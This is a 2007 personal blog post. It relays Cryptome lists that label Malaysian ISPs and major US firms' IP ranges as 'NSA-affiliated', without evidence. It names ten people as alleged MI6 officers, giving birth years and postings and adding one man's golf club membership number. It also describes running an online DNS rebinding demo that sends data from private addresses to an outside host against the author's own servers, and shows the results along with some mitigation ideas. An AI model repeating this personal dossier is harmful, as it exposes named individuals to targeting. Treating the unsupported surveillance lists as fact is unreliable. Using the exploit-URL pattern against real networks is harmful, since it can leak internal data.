My Grey Cells Burning

Source from cryptome and input data's filtered for things related to Malaysia & Kuala Lumpur.

This information could be a gift to Malaysia Independent 50th Golden Anniversary... which look bleak with all those superficial lights and sounds.

Happy Merdeka Day!

A sends 30 August 2007:

Please note the following, current as of 2105hrs GMT 30Aug2007:

TIME Telecommunications Sdn Bhd [NSA-affiliated IP range]
Kuala Lumpur MY
211.24.0.0 - 211.25.255.255
ns2.time.net.my [203.121.16.120]
ns1.time.net.my [203.121.16.85]


JARING Communications Sdn Bhd [NSA-affiliated IP range]
Kuala Lumpur MY
202.190.0.0 - 202.190.255.255
ns6.jaring.my [192.228.128.16]
ns5.jaring.my [61.6.38.139]

Looks like Maxis is still clean. And DIGi is not on the list.. yet.

Add-on popular companies among the list:

Google [NSA-affiliated IP ranges]
Mountain View CA US
64.233.160.0 - 64.233.191.255
66.102.0.0 - 66.102.15.255
66.249.64.0 - 66.249.95.255
72.14.192.0 - 72.14.255.255
209.85.128.0 - 209.85.255.255
216.239.32.0 - 216.239.63.255
ns3.google.com [216.239.36.10]
ns4.google.com [216.239.38.10]
ns1.google.com [216.239.32.10]
ns2.google.com [216.239.34.10]

Yahoo [NSA-affiliated IP ranges]
Sunnyvale CA US
69.147.64.0 - 69.147.127.255
216.155.192.0 - 216.155.207.255
ns4.yahoo.com [68.142.196.63]
ns2.yahoo.com [68.142.255.16]
ns5.yahoo.com [216.109.116.17]
ns1.yahoo.com [66.218.71.63]
ns3.yahoo.com [217.12.4.104]

AltaVista Company [NSA-affiliated IP range]
Sunnyvale CA US
216.39.48.0 - 216.39.63.255
ns4.yahoo.com [68.142.196.63]
ns2.yahoo.com [68.142.255.16]
ns5.yahoo.com [216.109.116.17]
ns1.yahoo.com [66.218.71.63]
ns3.yahoo.com [217.12.4.104]

Amazon.com, Inc. [NSA-affiliated IP range]
Seattle WA US
72.44.32.0 - 72.44.63.255
pdns3.ultradns.org [199.7.68.1]
pdns1.ultradns.net [204.74.108.1]
pdns2.ultradns.net [204.74.109.1]

Among many listed..

Source here.

Source from cryptome and filtered for things related to Malaysia & K.L.

Update! (17th August 07 12:21 pm)

Latest updated NSA-affiliated resources listed below, as of 16Aug07
at 1600hrs GMT.

Many new NSA-controlled/affiliated IP ranges are listed under
previously disclosed IP block assignees.
TMNET [NSA-affiliated IP ranges]
Kuala Lumpur MY
124.82.0.0 - 124.82.255.255
219.95.128.0 - 219.95.255.255
ns2.tm.net.my [202.188.1.8]
ns3.tm.net.my [202.188.0.184]
ns1.tm.net.my [202.188.0.183]

Source here.

Latest updated NSA-affiliated resources listed below, as of 10Aug07
at 1630hrs GMT.


Many new NSA-controlled/affiliated IP ranges are listed under
previously disclosed IP block assignees.

Telekom Malaysia Berhad [NSA-affiliated IP ranges]
Kuala Lumpur MY
60.48.0.0 - 60.54.255.255
218.111.0.0 - 218.111.255.255
ns2.tm.net.my [202.188.1.8]
ns3.tm.net.my [202.188.0.184]
ns1.tm.net.my [202.188.0.183]

Source here.

311 Names on the Three Lists of MI6 Officers (including 35 duplicates above) - Filtered to only those stayed in Malaysia and the year of services included.

Cortland Lucas Fransella: dob 1948; 73 Hong Kong, 80 Kuala Lumpur, 82 Santiago, 91 Rome, 95 London.*

Nigel Norman Inkster: dob 1952; 76 Kuala Lumpur, 79 Bangkok, 83 Peking, 85 Buenos Aires, 92 Athens, 94 Hong Kong, 98 London.

Anthony John Godwin Insall: dob 1949; 75 Lagos, 82 Hong Kong, 85 Peking, 92 Kuala Lumpur, 99 Oslo, 04 London.

John Jenkins: dob 1955; 83 Abu Dhabi, 89 Kuala Lumpur, 95 Kuwait, 99 Rangoon, 03 Jerusalem (CG).*

Richard Peter Moore: dob 1963; 90 Ankara, 91 Istanbul, 95 Islamabad, 01 Kuala Lumpur (Cllr).*

Note:
Perhaps this is the one and only Richard Peter Moore, playing golf at the Royal Selangor Golf Club, holding membership number #M9021-0. Among those involved with the A/B/C Medal - 7th February 2004 Strokeplay Net is Tunku Naquiyuddin Ibni Tuanku Ja'afar.

Colin Andrew Munro: dob 1946; 71 Bonn, 73 Kuala Lumpur, 81 Bucharest, 87 East Berlin,90 Frankfurt, 97 Zagreb, 01 Mostar, 03 Vienna (OSCE, Head of UK Delegation).*

Note:
Picture and profiles of Colin Andrew Munro can be seen from Yahoo cache. Somehow the British Embassy located in Vienna has deleted his entry from their website.

Simon Graham Page: dob 1961; 83 Kuala Lumpur, 88 Dublin, 92 New Delhi, 98 Riyadh, 01 London.(* 1 Sec, Bahrain, 05)

Patrick Gilmer Topping: dob 1959; 90 Kuala Lumpur, 94 Washington, 05 Canberra (Cllr).*

Kenneth Mark Williams: 76 Kuala Lumpur, 79 Bridgetown, 88 Harare, 94 Delhi; dob 1944.

Peter Gilruth Wood: dob 1953; 84 Taiwan, 86 Peking, 95 Kuala Lumpur, 02 Peking (Cllr).*

Source here.

Read about DNS rebinding attacks on Slashdot did make curiosity arise and those grey cells urged me to want to find out more about that since several Web and Mail server under my own supervision are working fine now and I of course doesn't want anything bad happen to my babies in the later future.

Query dancing on ChaCha reveals lot infos on DNS rebinding attacks howto which can be seen here and here... and here too. People can download the white paper describing the attack in details. But the easiest explanations can be found at Christian Matthias blog. Basically, this attacks will exploit DNS Pinning to steal informations. In short, "When someone requests a Web site such as www.example.com, the browser needs to perform a DNS lookup on that domain to get the associated numerical address (IP) of the server that hosts the Web site in question. In the next step, the browser sends a query to that IP that moreover contains the domain, a specific Web page and other variables to be able to ultimately retrieve the requested data." More informations and examples can be found at Mr Matthias blog.

Although the concepts look simple, but then the attacker will have hard time implementing it. As said by Mike Malone, "Though the concept is fairly simple, we agreed that it would be difficult to perform this sort of attack in practice. An attacker would need to have intimate knowledge of the victims internal network, or rely on Flash or other web technologies to perform a network scan. Moreover, an attack would end as soon as the victim closed their web browser". In short, get secure or your preferred unsecured browser will betray you silently.

Enough with devouring explanations, curiosity then move me on to this site here at jumperz.com to check whether I can run the exploit on my servers and also this host using the said exploit. This site will sent data from your private ip to www.jumperz.net to demonstrate how easy that is to steal informations using Anti-DNS Pinning attack. For this moment, I only target on localhost, web server and a mail server under my own supervision.

Entering the 127.0.0.1 into the box reveal failed attempt as shown below:

http://1186491925437.jumperz.net/exploits/dnsp3.jsp?address=127.0.0.1

Please wait for 120 seconds.
f1()
ERROR: uncaught exception: [Exception... "Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIXMLHttpRequest.send]" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "JS frame :: http://1186491925437.jumperz.net/exploits/dnsp3.jsp?address=127.0.0.1 :: f2 :: line 50" data: no]
ERROR:
ERROR: 0

(Which is differ with the result upon visiting to DNS rebinding site that shows the "We have detected that your browser is vulnerable to efficient DNS rebinding attacks" message).


Exploiting mail server also show failed attempts due to https redirection:

http://1286451923437.jumperz.net/exploits/dnsp3.jsp?address=xxx.xxx.24.219

<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You\'re speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />
<blockquote>Hint: <a href=\"https://mail.gov.my/\"><b>https://mail.gov.my/</b></a></blockquote></p>
</body></html>


And the most interesting result come from my web server with successful attempt(?) and part of the codes are shown below:

http://1184918537.jumperz.net/exploits/dnsp3.jsp?address=xxx.xxx.35.208

<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
<!--[if gte IE 5.5000]>
<script language=\"JavaScript\">
function correctPNG()
{ for(var i=0; i<document.images.length; i++)
{ var img = document.images[i]
var imgName = img.src.toUpperCase()
if (imgName.substring(imgName.length-3, imgName.length) == \"PNG\")
{ var imgID = (img.id) ? \"id=\'\" + img.id + \"\' \" : \"\"
var imgClass = (img.className) ? \"class=\'\" + img.className + \"\' \" : \"\"
var imgTitle = (img.title) ? \"title=\'\" + img.title + \"\' \" : \"title=\'\" + img.alt + \"\' \"
var imgStyle = \"display:inline-block;\" + img.style.cssText
if (img.align == \"left\") imgStyle = \"float:left;\" + imgStyle
if (img.align == \"right\") imgStyle = \"float:right;\" + imgStyle
if (img.parentElement.href) imgStyle = \"cursor:hand;\" + imgStyle
var strNewHTML = \"<span \" + imgID + imgClass + imgTitle
+ \" style=\\\"\" + \"width:\" + img.width + \"px; height:\" + img.height + \"px;\" + imgStyle + \";\"
+ \"filter:progid:DXImageTransform.Microsoft.AlphaImageLoader\"
+ \"(src=\\\'\" + img.src + \"\\\', sizingMethod=\'scale\');\\\"></span>\"
img.outerHTML = strNewHTML
i = i-1
}}}
window.attachEvent(\"onload\", correctPNG);
</script>
<![endif]-->
<title>My Client Website</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />
<link href=\"http://www.gov.my/templates/jo_june/css/template_css.css\" rel=\"stylesheet\" type=\"text/css\" />
<link rel=\"shortcut icon\" href=\"http://www.gov.my/templates/jo_june/images/favicon.ico\" />
<link rel=\"shortcut icon\" href=\"http://www.gov.my/images/icon.gif\" /><script type=\"text/javascript\" language=\"javascript\" src=\"http://www.gov.my/templates/jo_june/javascript.js\"></script>
</head><body><div align=\"center\">
<table width=\"820\" height=\"120\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" >
<tr>
<td height=\"96\" valign=\"top\"><table width=\"856\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<th width=\"820\" height=\"80\" align=\"left\" valign=\"middle\" scope=\"col\" class=\"header\">
<table width=\"856\" height=\"175\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
<tr>
<th scope=\"col\"><div align=\"left\"></div></th>
<th scope=\"col\"><div align=\"right\"> </div></th></tr></table>
</th></tr><tr>
<th width=\"820\" height=\"40\" align=\"left\" valign=\"bottom\" scope=\"row\" class=\"path\"><table width=\"856\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<th width=\"320\" align=\"left\" valign=\"middle\" scope=\"col\"><span class=\"pathway\">Laman Utama </span></th>
<th width=\"500\" align=\"left\" valign=\"bottom\" scope=\"col\">
<script type=\"text/javascript\">

one = function() {
var sfEls = document.getElementById(\"top_menu\").getElementsByTagName(\"li\");
for (var i=0; i<sfEls.length; i++) {
sfEls[i].onmouseover=function() {
this.className+=\"one\" }
sfEls[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(\"one\\\\b\"), \"\"); } } }
if (window.attachEvent) window.attachEvent(\"onload\", one);
</script>
<div id=\"top_menu\"><ul id=\"mainlevel-nav\"><li><a href=\"http://www.gov.my/index.php?option=com_contact&Itemid=3\" class=\"mainlevel-nav\" >Content</a></li><li><a href=\"http://www.gov.my/index.php?option=com_content&task=view&id=20&Itemid=31\" class=\"mainlevel-nav\" >Content</a></li><li><a href=\"http://www.gov.my/index.php?option=com_content&task=section&id=1&Itemid=2\" class=\"mainlevel-nav\" >Content</a></li><li><a href=\"http://www.gov.my/index.php\" class=\"mainlevel-nav\" >Content</a></li></ul></div></th>
</tr></table></th></tr></table></td></tr></table>
<table width=\"856\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" bordercolor=\"#000000\" bgcolor=\"#FFFFFF\">
<tr><td><table width=\"856\" border=\"0\" cellspacing=\"2\" cellpadding=\"0\">
<tr><td width=\"160\" align=\"left\" valign=\"top\"><table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\">
<tr><th valign=\"top\">
Content</th></tr><tr><td>
<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_frontpage&Itemid=1\" class=\"mainlevel\" id=\"active_menu\">Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=view&id=20&Itemid=31\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=view&id=16&Itemid=26\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=section&id=1&Itemid=2\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=25\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_search&Itemid=5\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_weblinks&Itemid=23\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_contact&Itemid=3\" class=\"mainlevel\" >Content</a></td></tr>
</table> </td></tr></table>
<table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\"><tr><td>
<a href=\"index.php?option=com_content&task=view&id=18&Itemid=29\"><img src=\"images/stories/picture.jpg\" border=\"0\" alt=\"messages\" width=\"150\" height=\"65\" /></a>
</td></tr></table><table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\">
<tr><td>
<a href=\"https://mail.gov.my/login.php\"><img src=\"images/stories/mail.jpg\" border=\"0\" alt=\"
" width=\"150\" height=\"80\" /></a> </td></tr></table>
<table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\"><tr><th valign=\"top\">
Content</th></tr><tr><td>
<a href=\"http://link.gov.my/default.asp\" target=\"_blank\"><div style=\"text-align: center\"><img src=\"images/images/logo.jpg\" border=\"0\" alt=\"Name\" width=\"96\" height=\"115\" /></div></a>
</td></tr></table>
<table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\"><tr>
<th valign=\"top\">Content</th></tr><tr><td>
<div class=\"syndicate\"><div align=\"center\">
<a href=\"http://www.gov.my/index.php?option=com_rss&feed=RSS0.91&no_html=1\">
<img src=\"http://www.gov.my/images/M_images/rss091.gif\" alt=\"RSS 0.91\" name=\"RSS091\" align=\"middle\" border=\"0\" /></a>
</div><div align=\"center\">
<a href=\"http://www.gov.my/index.php?option=com_rss&feed=RSS1.0&no_html=1\">
<img src=\"http://www.gov.my/images/M_images/rss10.gif\" alt=\"RSS 1.0\" name=\"RSS10\" align=\"middle\" border=\"0\" /></a>
</div><div align=\"center\">
<div align=\"center\"><a href=\"http://www.gov.my/index.php?option=com_rss&feed=OPML&no_html=1\">
<img src=\"http://www.gov.my/images/M_images/opml.png\" alt=\"OPML\" name=\"OPML\" align=\"middle\" border=\"0\" /></a>
</div></div> </td></tr></table>


So the question now is, How I gonna fix it?

More from Mike, "Nevertheless, a vulnerability clearly exists, and it could be difficult to resolve. Many web sites rely on round robin DNS configurations for load distribution. Since round robin configurations may legitimately return different IP addresses for the same host name, distinguishing malicious DNS rebinding attacks from round robin configurations will be difficult, if not impossible to do." Is that mean my web server is in deep shit?

Several choices can be found through searching on the Vah Vah Vah networks. Disable Javascript would be pain in the ass. Noscript firefox extension can help if not a lot, then a little. Another extension that some people recommends is localrodeo extension that can reduce possibilities for some browser from being exploited for the time being while waiting for another better finalized solutions. Change current DNS nameserver to OpenDNS can help to but obviously not for this kind of problem. Restrict external access to port 80 by means of firewall is also good precaution. But then, no one ever surf the Internet using browser installed within the targeted web server as far as I know which makes the exploits much harder to implement. Is that will make my web server secure?

Continue on the next part cos it's 04:20 a.m. Time to sleep. Need to build printer and file server (Samba) + some printing charging software (GPL of course!) tomorrow as part of charities project for a elementary school that I am working on during free time.